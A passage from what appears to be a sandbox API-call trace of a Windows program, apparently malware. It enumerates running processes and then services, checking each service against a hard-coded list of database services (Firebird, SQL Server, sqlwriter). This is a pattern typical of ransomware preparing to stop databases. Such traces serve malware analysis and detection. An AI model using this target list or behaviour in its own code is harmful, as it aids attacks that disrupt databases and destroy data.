cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0052.208] lstrlenW (lpString="explorer.exe") returned 12 [0052.208] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0052.209] lstrlenW (lpString="Memory Compression") returned 18 [0052.209] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0052.210] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0052.210] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0052.210] lstrlenW (lpString="SearchUI.exe") returned 12 [0052.210] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0052.211] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0052.211] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.212] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0052.212] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.212] lstrlenW (lpString="taskhostw.exe") returned 13 [0052.212] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0052.213] lstrlenW (lpString="UsoClient.exe") returned 13 [0052.213] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0052.214] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0052.214] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.214] lstrlenW (lpString="taskhostw.exe") returned 13 [0052.214] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0052.215] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0052.215] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0052.216] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0052.216] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0052.216] lstrlenW (lpString="msoia.exe") returned 9 [0052.217] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0052.217] lstrlenW (lpString="msoia.exe") returned 9 [0052.217] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0052.218] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0052.218] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0052.219] lstrlenW (lpString="screensaver.exe") returned 15 [0052.219] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0052.219] lstrlenW (lpString="xml upper.exe") returned 13 [0052.219] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0052.220] lstrlenW (lpString="defeat preston.exe") returned 18 [0052.220] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0052.221] lstrlenW (lpString="boss isolated.exe") returned 17 [0052.221] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0052.221] lstrlenW (lpString="member.exe") returned 10 [0052.221] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0052.222] lstrlenW (lpString="chubby-er.exe") returned 13 [0052.222] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0052.223] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0052.223] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0052.223] lstrlenW (lpString="organization.exe") returned 16 [0052.223] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0052.224] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0052.224] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0052.225] lstrlenW (lpString="spray-roman.exe") returned 15 [0052.225] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0052.225] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0052.225] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0052.226] lstrlenW (lpString="tank attacks.exe") returned 16 [0052.226] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0052.227] lstrlenW (lpString="wires jacket.exe") returned 16 [0052.227] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0052.228] lstrlenW (lpString="values.exe") returned 10 [0052.228] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0052.228] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0052.228] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0052.229] lstrlenW (lpString="printersaerospace.exe") returned 21 [0052.229] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0052.230] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0052.230] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0052.231] lstrlenW (lpString="dllhost.exe") returned 11 [0052.231] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0052.232] lstrlenW (lpString="joke.exe") returned 8 [0052.232] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0052.233] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0052.233] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0052.234] lstrlenW (lpString="documents.exe") returned 13 [0052.234] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0052.235] lstrlenW (lpString="rebel.exe") returned 9 [0052.235] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0052.235] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0052.235] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.236] lstrlenW (lpString="conhost.exe") returned 11 [0052.236] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.237] lstrlenW (lpString="conhost.exe") returned 11 [0052.237] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0052.238] lstrlenW (lpString="hgaibc.exe") returned 10 [0052.238] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.238] lstrlenW (lpString="cmd.exe") returned 7 [0052.238] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0052.239] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0052.239] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.240] lstrlenW (lpString="conhost.exe") returned 11 [0052.240] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.241] lstrlenW (lpString="conhost.exe") returned 11 [0052.241] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.241] lstrlenW (lpString="svchost.exe") returned 11 [0052.241] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0052.242] CloseHandle (hObject=0x324) returned 1 [0052.242] Sleep (dwMilliseconds=0x1f4) [0052.747] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea20 [0052.748] EnumServicesStatusExW (in: hSCManager=0x60ea20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0052.748] GetLastError () returned 0xea [0052.748] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0052.748] EnumServicesStatusExW (in: hSCManager=0x60ea20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0052.749] CloseServiceHandle (hSCObject=0x60ea20) returned 1 [0052.749] lstrlenW (lpString="Appinfo") returned 7 [0052.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0052.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0052.749] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0052.749] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0052.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0052.749] lstrlenW (lpString="AppXSvc") returned 7 [0052.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0052.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0052.749] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0052.749] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0052.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0052.749] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0052.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.749] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0052.750] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0052.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0052.750] lstrlenW (lpString="Audiosrv") returned 8 [0052.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0052.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0052.750] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0052.750] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0052.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0052.750] lstrlenW (lpString="BFE") returned 3 [0052.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0052.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0052.750] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0052.750] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0052.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0052.750] lstrlenW (lpString="BITS") returned 4 [0052.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0052.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0052.750] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0052.750] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0052.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0052.750] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0052.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0052.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0052.750] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0052.750] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0052.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0052.750] lstrlenW (lpString="CDPSvc") returned 6 [0052.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0052.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0052.750] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0052.750] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0052.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0052.751] lstrlenW (lpString="ClickToRunSvc") returned 13 [0052.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0052.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0052.751] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0052.751] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0052.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0052.751] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0052.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0052.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0052.751] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0052.751] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0052.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0052.751] lstrlenW (lpString="CryptSvc") returned 8 [0052.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0052.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0052.751] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0052.751] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0052.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0052.751] lstrlenW (lpString="DcomLaunch") returned 10 [0052.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.751] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0052.751] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0052.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0052.751] lstrlenW (lpString="DeviceAssociationService") returned 24 [0052.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0052.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0052.751] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0052.751] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0052.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0052.751] lstrlenW (lpString="Dhcp") returned 4 [0052.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0052.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0052.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0052.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0052.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0052.752] lstrlenW (lpString="Dnscache") returned 8 [0052.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0052.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0052.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0052.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0052.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0052.752] lstrlenW (lpString="DoSvc") returned 5 [0052.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0052.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0052.752] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0052.752] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0052.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0052.752] lstrlenW (lpString="DPS") returned 3 [0052.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 